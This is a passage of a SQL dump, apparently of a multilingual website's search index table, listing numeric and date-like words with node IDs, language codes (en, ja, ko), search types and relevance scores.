('3', 8, 'en', 'node_search', 2),
('3', 8, 'ja', 'node_search', 2),
('3', 24, 'en', 'node_search', 1),
('3', 24, 'ja', 'node_search', 0.879565),
('3', 24, 'ko', 'node_search', 1),
('3', 27, 'en', 'node_search', 0.76188),
('3', 27, 'ja', 'node_search', 4.90435),
('3', 31, 'en', 'node_search', 2),
('3', 62, 'en', 'node_search', 1.84718),
('3', 62, 'ja', 'node_search', 2.36663),
('3', 65, 'en', 'help_search', 1),
('3', 65, 'ja', 'help_search', 1),
('3', 65, 'ko', 'help_search', 1),
('3', 66, 'en', 'node_search', 2),
('3', 77, 'en', 'node_search', 4),
('3', 77, 'ja', 'node_search', 1),
('3', 144, 'ja', 'node_search', 1),
('3', 165, 'en', 'node_search', 6),
('3', 165, 'ja', 'node_search', 6.99983),
('3', 169, 'ja', 'node_search', 31.1685),
('3', 175, 'ja', 'node_search', 4.76922),
('3', 176, 'ja', 'node_search', 4.74069),
('3', 206, 'ja', 'node_search', 27),
('30', 7, 'en', 'node_search', 1),
('30', 7, 'ja', 'node_search', 1),
('30', 7, 'ko', 'node_search', 1),
('30', 18, 'en', 'node_search', 1),
('30', 18, 'ko', 'node_search', 1),
('30', 27, 'en', 'node_search', 0.882818),
('30', 27, 'ja', 'node_search', 0.504001),
('30', 62, 'ja', 'node_search', 2.36371),
('30', 133, 'en', 'node_search', 1),
('30', 133, 'ja', 'node_search', 1),
('30', 155, 'ja', 'node_search', 0.889397),
('300000', 163, 'ja', 'node_search', 0.822065),
('3022026', 160, 'en', 'node_search', 1),
('3022026', 160, 'ja', 'node_search', 1),
('3052026', 176, 'en', 'node_search', 1),
('3052026', 176, 'ja', 'node_search', 1),
('3092024', 128, 'en', 'node_search', 1),
('3092024', 128, 'ja', 'node_search', 1),
('3092024', 129, 'en', 'node_search', 1),
('3092024', 129, 'ja', 'node_search', 1),
('3092024', 130, 'en', 'node_search', 1),
('3092024', 130, 'ja', 'node_search', 1),
('3092024', 131, 'en', 'node_search', 1),
('3092024', 131, 'ja', 'node_search', 1),
('3162024', 123, 'en', 'node_search', 1),
('3162024', 123, 'ja', 'node_search', 1),
('3162024', 124, 'en', 'node_search', 1),
('3162024', 124, 'ja', 'node_search', 1),
('3162024', 125, 'en', 'node_search', 1),
('3162024', 125, 'ja', 'node_search', 1),
('3162024', 127, 'en', 'node_search', 1),
('3162024', 127, 'ja', 'node_search', 1),
('32', 11, 'ko', 'node_search', 1),
('32', 27, 'en', 'node_search', 0.712106),
('32', 27, 'ja', 'node_search', 0.357567),
('32', 31, 'en', 'node_search', 0.851346),
('3222024', 118, 'en', 'node_search', 1),
('3222024', 118, 'ja', 'node_search', 1),
('3222024', 119, 'en', 'node_search', 1),
('3222024', 119, 'ja', 'node_search', 1),
('3222024', 121, 'en', 'node_search', 1),
('3222024', 121, 'ja', 'node_search', 1),
('3272024', 117, 'en', 'node_search', 1),
('3272024', 117, 'ja', 'node_search', 1),
('3292026', 175, 'en', 'node_search', 1),
('3292026', 175, 'ja', 'node_search', 1),
('330', 18, 'ja', 'node_search', 1),
('330', 62, 'en', 'node_search', 1.83192),
('35', 5, 'en', 'node_search', 1),
('35', 5, 'ja', 'node_search', 0.819249),
('35', 5, 'ko', 'node_search', 1),
('35000', 162, 'en', 'node_search', 0.961087),
('35000', 162, 'ja', 'node_search', 0.707906),
('350000', 66, 'en', 'node_search', 1),
('36', 8, 'en', 'node_search', 1),
('36', 8, 'ja', 'node_search', 1),
('36', 8, 'ko', 'node_search', 1),
('362023', 17, 'en', 'node_search', 1),
('3must', 18, 'en', 'node_search', 1),
('3must', 18, 'ko', 'node_search', 1),
('3rd', 31, 'en', 'node_search', 1),
('3th', 95, 'en', 'node_search', 28),
('4', 18, 'ja', 'node_search', 0.98493),
('4', 24, 'en', 'node_search', 1),
('4', 24, 'ja', 'node_search', 0.848323),
('4', 24, 'ko', 'node_search', 1),
('4', 27, 'en', 'node_search', 0.691597),
('4', 27, 'ja', 'node_search', 4.51964),
('4', 31, 'en', 'node_search', 1),
('4', 62, 'ja', 'node_search', 1),
('4', 68, 'ja', 'node_search', 4),
('4', 69, 'en', 'node_search', 1),
('4', 69, 'ja', 'node_search', 1),
('4', 126, 'ja', 'node_search', 2),
('4', 156, 'ja', 'node_search', 1.9534),
('4', 157, 'ja', 'node_search', 1.84234),
('4', 165, 'ja', 'node_search', 30.9998),
('4', 167, 'ja', 'node_search', 33.6329),
('4', 171, 'ja', 'node_search', 7.11692),
('4', 173, 'ja', 'node_search', 7.04752),
('4', 174, 'ja', 'node_search', 4.72283),
('400', 145, 'en', 'node_search', 1),
('400', 145, 'ja', 'node_search', 1),
('4012026', 174, 'en', 'node_search', 1),
('4012026', 174, 'ja', 'node_search', 1),
('403', 72, 'en', 'help_search', 23),
('403', 72, 'ja', 'help_search', 23),
('403', 72, 'ko', 'help_search', 23),
('4032024', 135, 'en', 'node_search', 1),
('4032024', 135, 'ja', 'node_search', 1),
('403404', 72, 'en', 'help_search', 27),
('403404', 72, 'ja', 'help_search', 27),
('403404', 72, 'ko', 'help_search', 27),
('404', 72, 'en', 'help_search', 23.9769),
('404', 72, 'ja', 'help_search', 23.9769),
('404', 72, 'ko', 'help_search', 23.9769),
('4062024', 133, 'en', 'node_search', 1),
('4062024', 133, 'ja', 'node_search', 1),
('4092024', 69, 'en', 'node_search', 1),
('4092024', 69, 'ja', 'node_search', 1),
('40em', 6, 'en', 'help_search', 5),
('40em', 6, 'ja', 'help_search', 5),
('40em', 6, 'ko', 'help_search', 5),
('4102024', 126, 'en', 'node_search', 1),
('4102024', 126, 'ja', 'node_search', 1),
('4152024', 108, 'en', 'node_search', 1),
('4152024', 108, 'ja', 'node_search', 1),
('4212026', 156, 'en', 'node_search', 1),
('4212026', 156, 'ja', 'node_search', 1),
('4222024', 68, 'en', 'node_search', 1),
('4222024', 68, 'ja', 'node_search', 1),
('4222026', 173, 'en', 'node_search', 1),
('4222026', 173, 'ja', 'node_search', 1),
('4232026', 167, 'en', 'node_search', 1),
('4232026', 167, 'ja', 'node_search', 1),
('4262026', 157, 'en', 'node_search', 1),
('4262026', 157, 'ja', 'node_search', 1),
('4262026', 171, 'en', 'node_search', 1),
('4262026', 171, 'ja', 'node_search', 1),
('43', 9, 'en', 'node_search', 1),
('43', 9, 'ja', 'node_search', 1),
('43', 9, 'ko', 'node_search', 1),
('45', 31, 'en', 'node_search', 0.938382),
('4must', 18, 'en', 'node_search', 1),
('4must', 18, 'ko', 'node_search', 1),
('5', 5, 'en', 'node_search', 30),
('5', 5, 'ja', 'node_search', 5),
('5', 5, 'ko', 'node_search', 30),
('5', 7, 'en', 'node_search', 2),
('5', 7, 'ja', 'node_search', 1.82819),
('5', 7, 'ko', 'node_search', 2),
('5', 10, 'en', 'node_search', 1),
('5', 10, 'ja', 'node_search', 1),
('5', 10, 'ko', 'node_search', 1),
('5', 18, 'en', 'node_search', 28),
('5', 18, 'ja', 'node_search', 28.9496),
('5', 18, 'ko', 'node_search', 28),
('5', 23, 'en', 'help_search', 13.1162),
('5', 23, 'ja', 'help_search', 13.1162),
('5', 23, 'ko', 'help_search', 13.1162),
('5', 24, 'en', 'node_search', 1),
('5', 24, 'ja', 'node_search', 0.731649),
('5', 24, 'ko', 'node_search', 1),
('5', 27, 'ja', 'node_search', 1.504),
('5', 31, 'en', 'node_search', 1),
('5', 62, 'ja', 'node_search', 0.563797),
('5', 80, 'en', 'node_search', 4),
('5', 80, 'ja', 'node_search', 4),
('5', 154, 'ja', 'node_search', 28.7869),
('5', 163, 'ja', 'node_search', 0.805455),
('5', 169, 'ja', 'node_search', 4.16849),
('5', 176, 'en', 'node_search', 6),
('5', 176, 'ja', 'node_search', 4.74069),
('500', 31, 'en', 'node_search', 0.816452),
('500000', 31, 'en', 'node_search', 0.989021),
('50000000', 8, 'en', 'node_search', 2),
('50000000', 8, 'ja', 'node_search', 2),
('5022026', 170, 'en', 'node_search', 1),
('5022026', 170, 'ja', 'node_search', 1),
('5022026', 178, 'en', 'node_search', 1),
('5022026', 178, 'ja', 'node_search', 1),
('5082024', 115, 'en', 'node_search', 1),
('5082024', 115, 'ja', 'node_search', 1),
('5102026', 169, 'en', 'node_search', 1),
('5102026', 169, 'ja', 'node_search', 1),
('5182023', 7, 'en', 'node_search', 1),
('5182023', 7, 'ja', 'node_search', 1),
('5182023', 7, 'ko', 'node_search', 1),
('5182024', 93, 'en', 'node_search', 1),
('5182024', 93, 'ja', 'node_search', 1),
('5182024', 94, 'en', 'node_search', 1),
('5182024', 96, 'en', 'node_search', 1),
('5182024', 96, 'ja', 'node_search', 1),
('5182024', 97, 'en', 'node_search', 1),
('5182024', 97, 'ja', 'node_search', 1),
('5182024', 98, 'en', 'node_search', 1),
('5182024', 98, 'ja', 'node_search', 1),
('5182024', 99, 'en', 'node_search', 1),
('5182024', 99, 'ja', 'node_search', 1),
('5182024', 116, 'en', 'node_search', 1),
('5182024', 116, 'ja', 'node_search', 1),
('5192024', 73, 'en', 'node_search', 1),
('5192024', 73, 'ja', 'node_search', 1),
('5192024', 76, 'en', 'node_search', 1),
('5192024', 76, 'ja', 'node_search', 1),
('5192024', 111, 'en', 'node_search', 1),
('5192024', 111, 'ja', 'node_search', 1),
('5192024', 114, 'en', 'node_search', 1),
('5192024', 114, 'ja', 'node_search', 1),
('5202024', 71, 'en', 'node_search', 1),
('5202024', 71, 'ja', 'node_search', 1),
('5202024', 72, 'en', 'node_search', 1),
('5202024', 72, 'ja', 'node_search', 1),
('5202024', 74, 'en', 'node_search', 1),
('5202024', 74, 'ja', 'node_search', 1),
('5202024', 75, 'en', 'node_search', 1),
('5202024', 75, 'ja', 'node_search', 1),
('5202024', 82, 'en', 'node_search', 1),
('5202024', 82, 'ja', 'node_search', 1),
('5202024', 92, 'en', 'node_search', 1),
('5202024', 92, 'ja', 'node_search', 1),
('5202024', 109, 'en', 'node_search', 1),
('5202024', 109, 'ja', 'node_search', 1),
('5202024', 110, 'en', 'node_search', 1),
('5202024', 110, 'ja', 'node_search', 1),
('5202024', 112, 'en', 'node_search', 1),
('5202024', 112, 'ja', 'node_search', 1),
('5202026', 166, 'en', 'node_search', 1),
('5202026', 166, 'ja', 'node_search', 1),
('5202026', 168, 'en', 'node_search', 1),
('5202026', 168, 'ja', 'node_search', 1),
('5232024', 89, 'en', 'node_search', 1),
('5232024', 89, 'ja', 'node_search', 1),
('5232024', 91, 'en', 'node_search', 1),
('5232024', 91, 'ja', 'node_search', 1),
('5242024', 88, 'en', 'node_search', 1),
('5242024', 88, 'ja', 'node_search', 1),
('5262023', 8, 'en', 'node_search', 1),
('5262023', 8, 'ja', 'node_search', 1),
('5262023', 8, 'ko', 'node_search', 1),
('5292024', 84, 'en', 'node_search', 1),
('5292024', 84, 'ja', 'node_search', 1),
('5292024', 107, 'en', 'node_search', 1),
('5292024', 107, 'ja', 'node_search', 1),
('5292024', 113, 'en', 'node_search', 1),
('5292024', 113, 'ja', 'node_search', 1),
('530', 62, 'en', 'node_search', 0.886095),
('5302024', 87, 'en', 'node_search', 1),
('5302024', 87, 'ja', 'node_search', 1),
('5556677', 11, 'en', 'node_search', 1),
('5556677', 11, 'ja', 'node_search', 1),
('5556677', 11, 'ko', 'node_search', 1),
('5556677', 62, 'en', 'node_search', 0.781775),
('5556677', 62, 'ja', 'node_search', 0.469016),
('5must', 18, 'en', 'node_search', 1),
('5must', 18, 'ko', 'node_search', 1),
('6', 3, 'en', 'node_search', 1),
('6', 3, 'ja', 'node_search', 1),
('6', 3, 'ko', 'node_search', 1),
('6', 20, 'ja', 'node_search', 4),
('6', 24, 'en', 'node_search', 0.899454),
('6', 24, 'ja', 'node_search', 0.581429),
('6', 24, 'ko', 'node_search', 0.961087),
('6', 31, 'en', 'node_search', 1.98087),
('6', 65, 'en', 'help_search', 1),
('6', 65, 'ja', 'help_search', 1),
('6', 65, 'ko', 'help_search', 1),
('6', 77, 'ja', 'node_search', 4),
('6', 78, 'ja', 'node_search', 1),
('6', 154, 'ja', 'node_search', 4.78691),
('6', 155, 'ja', 'node_search', 0.920273),
('6', 163, 'ja', 'node_search', 0.650439),
('6', 164, 'ja', 'node_search', 1.75231),
('6', 165, 'ja', 'node_search', 6.99983),
('60', 19, 'en', 'node_search', 28),
('60', 19, 'ja', 'node_search', 28),
('60', 19, 'ko', 'node_search', 28),
('6022024', 79, 'en', 'node_search', 1),
('6022024', 80, 'en', 'node_search', 1),
('6022024', 80, 'ja', 'node_search', 1),
('6032023', 6, 'en', 'node_search', 1),
('6032023', 6, 'ja', 'node_search', 1),
('6032023', 6, 'ko', 'node_search', 1),
('6032023', 9, 'en', 'node_search', 1),
('6032023', 9, 'ja', 'node_search', 1),
('6032023', 9, 'ko', 'node_search', 1),
('6032023', 17, 'en', 'node_search', 1),
('6032023', 17, 'ja', 'node_search', 1),
('6032023', 17, 'ko', 'node_search', 1),
('6032026', 165, 'en', 'node_search', 1),
('6032026', 165, 'ja', 'node_search', 1),
('6042024', 81, 'en', 'node_search', 1),
('6042024', 81, 'ja', 'node_search', 1),
('6042024', 85, 'en', 'node_search', 1),
('6042024', 85, 'ja', 'node_search', 1),
('6062024', 86, 'en', 'node_search', 1),
('6062024', 86, 'ja', 'node_search', 1),
('6062024', 102, 'en', 'node_search', 1),
('6062024', 102, 'ja', 'node_search', 1),
('6062024', 104, 'en', 'node_search', 1),
('6062024', 104, 'ja', 'node_search', 1),
('6062024', 106, 'en', 'node_search', 1),
('6062024', 106, 'ja', 'node_search', 1),
('6072024', 101, 'en', 'node_search', 1),
('6072024', 101, 'ja', 'node_search', 1),
('6132024', 78, 'en', 'node_search', 1),
('6132024', 78, 'ja', 'node_search', 1),
('6142023', 19, 'en', 'node_search', 1),
('6142023', 19, 'ja', 'node_search', 1),
('6142023', 19, 'ko', 'node_search', 1),
('6142026', 154, 'en', 'node_search', 1),
('6142026', 154, 'ja', 'node_search', 1),
('6142026', 155, 'en', 'node_search', 1),
('6142026', 155, 'ja', 'node_search', 1),
('6162026', 163, 'en', 'node_search', 1),
('6162026', 163, 'ja', 'node_search', 1),
('6172024', 100, 'en', 'node_search', 1),
('6172024', 100, 'ja', 'node_search', 1),
('6172026', 162, 'en', 'node_search', 1),
('6172026', 162, 'ja', 'node_search', 1),
('6192023', 20, 'en', 'node_search', 1),
('6192023', 20, 'ja', 'node_search', 1),
('6192023', 20, 'ko', 'node_search', 1),
('6192026', 154, 'en', 'node_search', 1),
('6192026', 154, 'ja', 'node_search', 1),
('6192026', 155, 'en', 'node_search', 1),
('6192026', 155, 'ja', 'node_search', 1),
('6192026', 156, 'en', 'node_search', 1),
('6192026', 156, 'ja', 'node_search', 1),
('6192026', 157, 'en', 'node_search', 1),
('6192026', 157, 'ja', 'node_search', 1),
('6192026', 160, 'en', 'node_search', 1),
('6192026', 160, 'ja', 'node_search', 1),
('6192026', 161, 'en', 'node_search', 1),
('6192026', 161, 'ja', 'node_search', 1),
('6192026', 162, 'en', 'node_search', 1),
('6192026', 162, 'ja', 'node_search', 1),
('6192026', 163, 'en', 'node_search', 1),
('6192026', 163, 'ja', 'node_search', 1),
('6192026', 164, 'en', 'node_search', 1),
('6192026', 164, 'ja', 'node_search', 1),
('6192026', 165, 'en', 'node_search', 1),
('6192026', 165, 'ja', 'node_search', 1),
('6192026', 166, 'en', 'node_search', 1),
('6192026', 166, 'ja', 'node_search', 1),
('6192026', 167, 'en', 'node_search', 1),
('6192026', 167, 'ja', 'node_search', 1),
('6192026', 168, 'en', 'node_search', 1),
('6192026', 168, 'ja', 'node_search', 1),
('6192026', 169, 'en', 'node_search', 1),
('6192026', 169, 'ja', 'node_search', 1),
('6192026', 170, 'en', 'node_search', 1),
('6192026', 170, 'ja', 'node_search', 1),
('6192026', 171, 'en', 'node_search', 1),
('6192026', 171, 'ja', 'node_search', 1),
('6192026', 173, 'en', 'node_search', 1),
('6192026', 173, 'ja', 'node_search', 1),
('6192026', 174, 'en', 'node_search', 1),
('6192026', 174, 'ja', 'node_search', 1),
('6192026', 175, 'en', 'node_search', 1),
('6192026', 175, 'ja', 'node_search', 1),
('6192026', 176, 'en', 'node_search', 1),
('6192026', 176, 'ja', 'node_search', 1),
('6192026', 177, 'en', 'node_search', 1),
('6192026', 177, 'ja', 'node_search', 1),
('6192026', 178, 'en', 'node_search', 1),
('6192026', 178, 'ja', 'node_search', 1),
('6192026', 179, 'en', 'node_search', 1),
('6192026', 179, 'ja', 'node_search', 1),
('6192026', 180, 'en', 'node_search', 1),
('6192026', 180, 'ja', 'node_search', 1),
('6192026', 181, 'en', 'node_search', 1),
('6192026', 181, 'ja', 'node_search', 1),
('6192026', 182, 'en', 'node_search', 1),
('6192026', 182, 'ja', 'node_search', 1),
('6192026', 183, 'en', 'node_search', 1),
('6192026', 183, 'ja', 'node_search', 1),
('6192026', 184, 'en', 'node_search', 1),
('6192026', 184, 'ja', 'node_search', 1),
('6192026', 185, 'en', 'node_search', 1),
('6192026', 185, 'ja', 'node_search', 1),
('6192026', 186, 'en', 'node_search', 1),
('6192026', 186, 'ja', 'node_search', 1),
('6202023', 1, 'en', 'node_search', 1),
('6202023', 3, 'en', 'node_search', 2),
('6202023', 3, 'ja', 'node_search', 1),
('6202023', 3, 'ko', 'node_search', 1),
('6202023', 4, 'en', 'node_search', 1),
('6202023', 5, 'en', 'node_search', 1),
('6202023', 6, 'en', 'node_search', 1),
('6202023', 7, 'en', 'node_search', 1),
('6202023', 8, 'en', 'node_search', 1),
('6202023', 9, 'en', 'node_search', 1),
('6202023', 10, 'en', 'node_search', 1),
('6202026', 187, 'en', 'node_search', 1),
('6202026', 187, 'ja', 'node_search', 1),
('6202026', 188, 'en', 'node_search', 1),
('6202026', 188, 'ja', 'node_search', 1),
('6202026', 189, 'en', 'node_search', 1),
('6202026', 189, 'ja', 'node_search', 1),
('6202026', 190, 'en', 'node_search', 1),
('6202026', 190, 'ja', 'node_search', 1),
('6202026', 191, 'en', 'node_search', 1),
('6202026', 191, 'ja', 'node_search', 1),
('6202026', 192, 'en', 'node_search', 1),
('6202026', 192, 'ja', 'node_search', 1),
('6202026', 193, 'en', 'node_search', 1),
('6202026', 193, 'ja', 'node_search', 1),
('6202026', 194, 'en', 'node_search', 1),
('6202026', 194, 'ja', 'node_search', 1),
('6202026', 195, 'en', 'node_search', 1),
('6202026', 195, 'ja', 'node_search', 1),
('6202026', 196, 'en', 'node_search', 1),
('6202026', 196, 'ja', 'node_search', 1),
('6202026', 197, 'en', 'node_search', 1),
('6202026', 197, 'ja', 'node_search', 1),
('6202026', 198, 'en', 'node_search', 1),
('6202026', 198, 'ja', 'node_search', 1),
('6202026', 199, 'en', 'node_search', 1),
('6202026', 199, 'ja', 'node_search', 1),
('6202026', 200, 'ja', 'node_search', 1),
('6212023', 5, 'en', 'node_search', 1),
('6212023', 5, 'ja', 'node_search', 1),
('6212023', 5, 'ko', 'node_search', 1),
('6212023', 10, 'en', 'node_search', 1),
('6212023', 10, 'ja', 'node_search', 1),
('6212023', 10, 'ko', 'node_search', 1),
('6212023', 11, 'en', 'node_search', 1),
('6222023', 4, 'en', 'node_search', 1),
('6222023', 4, 'ja', 'node_search', 1),
('6222023', 4, 'ko', 'node_search', 1),
('6232023', 18, 'en', 'node_search', 1),
('6232023', 18, 'ja', 'node_search', 1),
('6232023', 18, 'ko', 'node_search', 1),
('6242024', 90, 'en', 'node_search', 1),
('6242024', 90, 'ja', 'node_search', 1),
('6252024', 68, 'en', 'node_search', 1),
('6252024', 68, 'ja', 'node_search', 1),
('6252024', 69, 'en', 'node_search', 1),
('6252024', 69, 'ja', 'node_search', 1),
('6252024', 70, 'en', 'node_search', 1),
('6252024', 70, 'ja', 'node_search', 1),
('6252024', 71, 'en', 'node_search', 1),
('6252024', 71, 'ja', 'node_search', 1),
('6252024', 72, 'en', 'node_search', 1),
('6252024', 72, 'ja', 'node_search', 1),
('6252024', 73, 'en', 'node_search', 1),
('6252024', 73, 'ja', 'node_search', 1),
('6252024', 74, 'en', 'node_search', 1),
('6252024', 74, 'ja', 'node_search', 1),
('6252024', 75, 'en', 'node_search', 1),
('6252024', 75, 'ja', 'node_search', 1),
('6252024', 76, 'en', 'node_search', 1),
('6252024', 76, 'ja', 'node_search', 1),
('6252024', 77, 'en', 'node_search', 2),
('6252024', 77, 'ja', 'node_search', 2),
('6252024', 78, 'en', 'node_search', 1),
('6252024', 78, 'ja', 'node_search', 1),
('6252024', 79, 'en', 'node_search', 1),
('6252024', 80, 'en', 'node_search', 1),
('6252024', 80, 'ja', 'node_search', 1),
('6252024', 81, 'en', 'node_search', 1),
('6252024', 81, 'ja', 'node_search', 1),
('6252024', 82, 'en', 'node_search', 1),
('6252024', 82, 'ja', 'node_search', 1),
('6252024', 83, 'en', 'node_search', 1),
('6252024', 83, 'ja', 'node_search', 1),
('6252024', 84, 'en', 'node_search', 1),
('6252024', 84, 'ja', 'node_search', 1),
('6252024', 85, 'en', 'node_search', 1),
('6252024', 85, 'ja', 'node_search', 1),
('6252024', 86, 'en', 'node_search', 1),
('6252024', 86, 'ja', 'node_search', 1),
('6252024', 87, 'en', 'node_search', 1),
('6252024', 87, 'ja', 'node_search', 1),
('6252024', 88, 'en', 'node_search', 1),
('6252024', 88, 'ja', 'node_search', 1),
('6252024', 89, 'en', 'node_search', 1),
('6252024', 89, 'ja', 'node_search', 1),
('6252024', 90, 'en', 'node_search', 1),
('6252024', 90, 'ja', 'node_search', 1),
('6252024', 91, 'en', 'node_search', 1),
('6252024', 91, 'ja', 'node_search', 1),
('6252024', 92, 'en', 'node_search', 1),
('6252024', 92, 'ja', 'node_search', 1),
('6252024', 93, 'en', 'node_search', 1),
('6252024', 93, 'ja', 'node_search', 1),
('6252024', 94, 'en', 'node_search', 1),
('6252024', 95, 'en', 'node_search', 1),
('6252024', 95, 'ja', 'node_search', 1),
('6252024', 96, 'en', 'node_search', 1),
('6252024', 96, 'ja', 'node_search', 1),
('6252024', 97, 'en', 'node_search', 1),
('6252024', 97, 'ja', 'node_search', 1),
('6252024', 98, 'en', 'node_search', 1),
('6252024', 98, 'ja', 'node_search', 1),
('6252024', 99, 'en', 'node_search', 1),
('6252024', 99, 'ja', 'node_search', 1),
('6262024', 100, 'en', 'node_search', 1),
('6262024', 100, 'ja', 'node_search', 1),
('6262024', 101, 'en', 'node_search', 1),
('6262024', 101, 'ja', 'node_search', 1),
('6262024', 102, 'en', 'node_search', 1),
('6262024', 102, 'ja', 'node_search', 1),
('6262024', 103, 'en', 'node_search', 1),
('6262024', 103, 'ja', 'node_search', 1),
('6262024', 104, 'en', 'node_search', 1),
('6262024', 104, 'ja', 'node_search', 1),
('6262024', 105, 'en', 'node_search', 1),
('6262024', 105, 'ja', 'node_search', 1),
('6262024', 106, 'en', 'node_search', 1),
('6262024', 106, 'ja', 'node_search', 1),
('6262024', 107, 'en', 'node_search', 1),
('6262024', 107, 'ja', 'node_search', 1),
('6262024', 108, 'en', 'node_search', 1),
('6262024', 108, 'ja', 'node_search', 1),
('6262024', 109, 'en', 'node_search', 1),
('6262024', 109, 'ja', 'node_search', 1),
('6262024', 110, 'en', 'node_search', 1),
('6262024', 110, 'ja', 'node_search', 1),
('6262024', 111, 'en', 'node_search', 1),
('6262024', 111, 'ja', 'node_search', 1),
('6262024', 112, 'en', 'node_search', 1),
('6262024', 112, 'ja', 'node_search', 1),
('6262024', 113, 'en', 'node_search', 1),
('6262024', 113, 'ja', 'node_search', 1),
('6262024', 114, 'en', 'node_search', 1),
('6262024', 114, 'ja', 'node_search', 1),
('6262024', 115, 'en', 'node_search', 1),
('6262024', 115, 'ja', 'node_search', 1),
('6262024', 116, 'en', 'node_search', 1),
('6262024', 116, 'ja', 'node_search', 1),
('6262024', 117, 'en', 'node_search', 1),
('6262024', 117, 'ja', 'node_search', 1),
('6262024', 118, 'en', 'node_search', 1),
('6262024', 118, 'ja', 'node_search', 1),
('6262024', 119, 'en', 'node_search', 1),
('6262024', 119, 'ja', 'node_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('6262024', 120, 'en', 'node_search', 1),
('6262024', 120, 'ja', 'node_search', 1),
('6262024', 121, 'en', 'node_search', 1),
('6262024', 121, 'ja', 'node_search', 1),
('6262024', 122, 'en', 'node_search', 1),
('6262024', 122, 'ja', 'node_search', 1),
('6262024', 123, 'en', 'node_search', 1),
('6262024', 123, 'ja', 'node_search', 1),
('6262024', 124, 'en', 'node_search', 1),
('6262024', 124, 'ja', 'node_search', 1),
('6262024', 125, 'en', 'node_search', 1),
('6262024', 125, 'ja', 'node_search', 1),
('6262024', 126, 'en', 'node_search', 1),
('6262024', 126, 'ja', 'node_search', 1),
('6262024', 127, 'en', 'node_search', 1),
('6262024', 127, 'ja', 'node_search', 1),
('6262024', 128, 'en', 'node_search', 1),
('6262024', 128, 'ja', 'node_search', 1),
('6262024', 129, 'en', 'node_search', 1),
('6262024', 129, 'ja', 'node_search', 1),
('6262024', 130, 'en', 'node_search', 1),
('6262024', 130, 'ja', 'node_search', 1),
('6262024', 131, 'en', 'node_search', 1),
('6262024', 131, 'ja', 'node_search', 1),
('6272024', 132, 'en', 'node_search', 1),
('6272024', 132, 'ja', 'node_search', 1),
('6272024', 133, 'en', 'node_search', 1),
('6272024', 133, 'ja', 'node_search', 1),
('6272024', 134, 'en', 'node_search', 1),
('6272024', 134, 'ja', 'node_search', 1),
('6272024', 135, 'en', 'node_search', 1),
('6272024', 135, 'ja', 'node_search', 1),
('6272024', 136, 'en', 'node_search', 1),
('6272024', 136, 'ja', 'node_search', 1),
('6272024', 137, 'en', 'node_search', 1),
('6272024', 137, 'ja', 'node_search', 1),
('6272024', 138, 'en', 'node_search', 1),
('6272024', 138, 'ja', 'node_search', 1),
('6272024', 139, 'en', 'node_search', 1),
('6272024', 139, 'ja', 'node_search', 1),
('6272024', 140, 'en', 'node_search', 1),
('6272024', 140, 'ja', 'node_search', 1),
('6272024', 141, 'en', 'node_search', 1),
('6272024', 141, 'ja', 'node_search', 1),
('6272024', 142, 'en', 'node_search', 1),
('6272024', 142, 'ja', 'node_search', 1),
('6272024', 143, 'en', 'node_search', 1),
('6272024', 143, 'ja', 'node_search', 1),
('6272024', 144, 'en', 'node_search', 1),
('6272024', 144, 'ja', 'node_search', 1),
('6282024', 145, 'en', 'node_search', 2),
('6282024', 145, 'ja', 'node_search', 2),
('6282024', 146, 'en', 'node_search', 2),
('6282024', 146, 'ja', 'node_search', 2),
('6282024', 147, 'en', 'node_search', 1),
('6282024', 147, 'ja', 'node_search', 1),
('6292024', 147, 'en', 'node_search', 1),
('6292024', 147, 'ja', 'node_search', 1),
('6302024', 150, 'en', 'node_search', 1),
('6302024', 150, 'ja', 'node_search', 1),
('632', 11, 'en', 'node_search', 1),
('7', 24, 'en', 'node_search', 0.869951),
('7', 24, 'ja', 'node_search', 0.489781),
('7', 24, 'ko', 'node_search', 0.869951),
('7', 29, 'ja', 'node_search', 1),
('7', 31, 'en', 'node_search', 0.949597),
('7', 65, 'en', 'help_search', 13),
('7', 65, 'ja', 'help_search', 13),
('7', 65, 'ko', 'help_search', 13),
('7', 134, 'en', 'node_search', 27),
('7', 134, 'ja', 'node_search', 27),
('7', 142, 'ja', 'node_search', 1),
('7012023', 17, 'en', 'node_search', 1),
('7012023', 18, 'en', 'node_search', 1),
('7012023', 19, 'en', 'node_search', 1),
('7012023', 20, 'en', 'node_search', 1),
('7022024', 148, 'en', 'node_search', 2),
('7022024', 148, 'ja', 'node_search', 2),
('7022024', 149, 'en', 'node_search', 1),
('7032023', 1, 'ja', 'node_search', 1),
('7032023', 1, 'ko', 'node_search', 1),
('7032023', 3, 'ja', 'node_search', 1),
('7032023', 3, 'ko', 'node_search', 1),
('7032023', 4, 'ja', 'node_search', 1),
('7032023', 4, 'ko', 'node_search', 1),
('7032023', 5, 'ko', 'node_search', 1),
('7032023', 6, 'ja', 'node_search', 1),
('7032023', 6, 'ko', 'node_search', 1),
('7032023', 7, 'ja', 'node_search', 1),
('7032023', 7, 'ko', 'node_search', 1),
('7032023', 8, 'ja', 'node_search', 1),
('7032023', 8, 'ko', 'node_search', 1),
('7032023', 9, 'ja', 'node_search', 1),
('7032023', 9, 'ko', 'node_search', 1),
('7032023', 10, 'ja', 'node_search', 1),
('7032023', 10, 'ko', 'node_search', 1),
('7032023', 11, 'ja', 'node_search', 1),
('7032023', 11, 'ko', 'node_search', 1),
('7032023', 17, 'ja', 'node_search', 1),
('7032023', 17, 'ko', 'node_search', 1),
('7032023', 18, 'ja', 'node_search', 1),
('7032023', 18, 'ko', 'node_search', 1),
('7032023', 19, 'ja', 'node_search', 1),
('7032023', 19, 'ko', 'node_search', 1),
('7032023', 20, 'ja', 'node_search', 1),
('7032023', 20, 'ko', 'node_search', 1),
('7032023', 21, 'en', 'node_search', 1),
('7032023', 22, 'en', 'node_search', 1),
('7032023', 23, 'en', 'node_search', 1),
('7032023', 23, 'ja', 'node_search', 1),
('7032023', 23, 'ko', 'node_search', 1),
('7032023', 24, 'en', 'node_search', 1),
('7032023', 24, 'ja', 'node_search', 1),
('7032023', 25, 'en', 'node_search', 1),
('7032023', 25, 'ja', 'node_search', 1),
('7032023', 25, 'ko', 'node_search', 1),
('7032023', 26, 'en', 'node_search', 1),
('7032023', 26, 'ja', 'node_search', 1),
('7032023', 26, 'ko', 'node_search', 1),
('7032023', 27, 'en', 'node_search', 1),
('7032023', 27, 'ja', 'node_search', 1),
('7032023', 27, 'ko', 'node_search', 1),
('7042023', 24, 'ko', 'node_search', 1),
('7042024', 149, 'en', 'node_search', 1),
('7042024', 150, 'en', 'node_search', 1),
('7042024', 150, 'ja', 'node_search', 1),
